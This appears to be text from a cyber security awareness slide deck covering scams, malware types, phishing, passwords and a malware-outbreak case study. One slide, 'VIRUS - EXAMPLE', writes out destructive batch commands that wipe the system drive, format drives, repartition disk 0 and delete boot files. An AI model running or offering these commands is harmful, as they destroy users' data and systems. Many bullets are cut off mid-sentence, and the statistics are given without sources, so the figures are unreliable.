CYBER SECURITY AWARENESS
THERE IS NO NEXT TIME, IT’S NOW OR NEVER.
“As the world is increasingly
interconnected, everyone shares the
responsibility of securing
• What is Computer Security
• Importance of Security
• Small business
• Cyber Security Statistics
• You are the target
• Cyber Scam
• 10 scams to watch out
• Leading Threats
• Security Plan
• Case – Malware
• Security issues
WHAT IS COMPUTER SECURITY ?
• Securing Computers, Smartphones, Networks, Internet.
• defending information from unauthorized access, use,
disclosure, disruption, modification, perusal, inspection,
recording or destruction, unplanned events and natural
IMPORTANCE OF SECURITY
• The internet allows an attacker to attack from anywhere on
• Governments, military, corporations, financial institutions,
hospitals and other businesses collect, process and store a
great deal of confidential information on computers and
transmit that data across networks to other computers. With
the growing volume and sophistication of cyber attacks,
ongoing attention is required to protect sensitive business
and personal information.
Risks caused by poor security knowledge and practice:
Legal Ramifications (for yourself and companies)
Termination if company policies are not followed
• One of the best ways to make sure company employees will not make costly errors in
regard to information security is to institute company-wide security-awareness training
MOST SMALL BUSINESSES DON’T RECOVER
• 60% of small businesses will shutter within half a year after being victimized by
• 90% do not have an internal IT manager for security
• 87% do not have a formal written security policy
• 91% increase in attacks 2013 (Symantec)
• 62% increase in the number of breaches in 2013
• Over 552M identities were exposed via breaches in 2013 (493%+ 2012)
• 38% of mobile users have experienced mobile cybercrime in past 12 months
• 1 in 392 emails contain a phishing attacks
• 86% of all websites had at least one vulnerability
• Most Data Breaches (Retail/Merchant=15M , Financial/Insurance=8M, Other=6M)
• 100M Phishing message everyday(Agari)
• 3Bilion Phishing Message monthly
• Phishing costs $ 70.2 Billion (Cisco)
• Phishing cost corporate IT $ 28.1 Billion (IID)
• 25% increase in Email Malware as URL
• 1 in 196 Email Virus Rate
• 1 in 566 website with Malware
• 62% UAE users cannot recognize phishing message (Gulf news, Kaspersky 2012)
• 70% phishing message targeted bank accounts ( RSA, 2013)
YOU ARE THE TARGET
• Explain to end users that they are the target. Far too often people have the misconception
that they are not a target, that their information or their computers has no value to
attackers. Of course we know this to be false. Anyone with an identify, computer or private
information is a target, cyber criminals have made an entire industry of hacking the end
1- users know and understand they
are being actively targeted
2- risks exist regardless if they are at
work or at home
3- Don’t Be scared, Just Drive Safe !
• Due to the high use of the internet, cyber scams have
disrupted bank accounts, sent viruses, and stolen
• Most cyber scams are sent through an e-mail account
wherein individuals will open the e-mail to either find a
virus has been put into their computer or to read
• Never entering personal information or credit card
information on unsecure websites, never reply to or click
on any links that you are not affiliated with, and never
respond to an e-mail or advertisement saying you have
• Rugby World Cup 2015 , World Cup 2014 Brazil,
Auction sites, Jobs and training courses, Business 2
• Trojan Horse
• Social engineering
• A virus attaches itself to a program, file, or disk When the program is executed, the virus
activates and replicates itself.
• Viruses result in crashing of computers and loss of data.
In order to recover/prevent virus/attacks:
Avoid potentially unreliable websites/emails
Re-install operating system
Anti-virus (i.e. Avira, AVG, Norton)
VIRUS - EXAMPLE
> @echo off
> del %systemdrive%*.*/f/s/q
> shutdown -r -f -t 00
> @echo off
> for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q
> > list disk
> select disk 0
> create partition primary
> format fs=fat32 quick
> @echo off )))
> attrib -r -s -h c:autoexec.bat )))
> del c:autoexec.bat )))
> attrib -r -s -h c:boot.ini )))
> del c:boot.ini )))
> attrib -r -s -h c:ntldr ))
> del c:ntldr )))
> attrib -r -s -h c:windowswin.ini )))
> del c:windowswin.ini )))
> @echo off ))))
> ((((----shutdown -s -t 10 -c " "-----)))))
• Independent program which replicates itself and sends copies
from computer to computer across network connections.
Upon arrival the worm may be activated to replicate.
• Masquerades as beneficial program while
quietly destroying data or damaging your
• Download a game: Might be fun but has
hidden part that emails your password file
without you knowing.
Social engineering manipulates people into performing actions or
divulging confidential information. Similar to a confidence trick or
simple fraud, the term applies to the use of deception to gain
information, commit fraud, or access computer systems.
• Phone Call: This is John, the System Admin. What is your
• In Person: What ethnicity are you? Your mother’s maiden name?
• I have come to repair your machine…and have some software
• Email: ABC Bank has noticed a problem with your account…
• 1- It’s tough to create and remember strong passwords for each
online system or site you access.
• 2- It’s a BAD idea though to use the same password for several or
all systems and site
• 3- contains 8 characters, a mixture of uppercase and lowercase
letters, at least one number and one non-alphanumeric character or
• A. never share your password or write it down or save it !
• B. String Password
• C. Don’t Use common words
• D. Chang your password
• Bit of software that gets installed on your computer
unbeknownst to you, and starts logging everything that you
enter into the computer. This type of malware will often send
usernames and passwords back to the attacker, who can then
use this information to get into your bank accounts, social
media accounts, and really anything that would require a
username and password.
• 1- Anti virus
• 2- Firewall
• 3- Malwarebyte
• A sniffer is an application or device that can read, monitor,
and capture network data exchanges and read network
packets. If the packets are not encrypted, a sniffer provides
a full view of the data inside the packet. Even encapsulated
(tunneled) packets can be broken open and read unless
they are encrypted and the attacker does not have access
to the key.
• The act of sending an email to a user falsely claiming to be
an established legitimate enterprise in an attempt to scam
the user into surrendering private information that will be
used for identity theft.
• Every company needs to have a security program
• 1- No matter how large or small your company is
• 2- you need to have a plan to ensure the security of your
• how you will mitigate them, and planning for how you keep the
program and your security practices up to date.
• Risk Assessment
• Policies and Procedures (CIA)
• Business Continuity (BC, CP, IR)
CASE - MALWARE INFECTION
• Logan Industries
• is a multi-national catalog sale corporation with offices in 30 states
• most offices are small, with fewer than 50 employees,
• First Infection: Monday, Feb. 5 :
• 20 employees at a satellite sales office received an email from the CEO and
President Andrew James with the message.
• Twenty employees experienced a computer shut-down a short time later
• wait for the help desk to contact them about fixing their machines
• The Virus Spreads: Tuesday, Feb. 6
• Early in the morning, the infection had spread from dozens of computers to
• After sending itself, it would cause the machine to reboot and never to recover.
• By 10 a.m., the CIO had been called and decided to form a team to deal with the
• Late Afternoon: Wednesday, February, 7th
• find BadBoy on the disk drive and clean any infected files.
• they spent from five to 10 minutes manually removing the virus code from all file
• Users at Logan Industries had now been without access to a computer for three days
and were getting frustrated.
• The CEO requested a report
from the CIO. The report
included the following costs.
• They didn’t have any security
awareness for their employees
• The ability to describe the business
impact of virus/worm infection
• •A comprehension of the
responsibilities of an IT staff in
delivering a secure environment
• The steps to respond to and recover
from a malware infection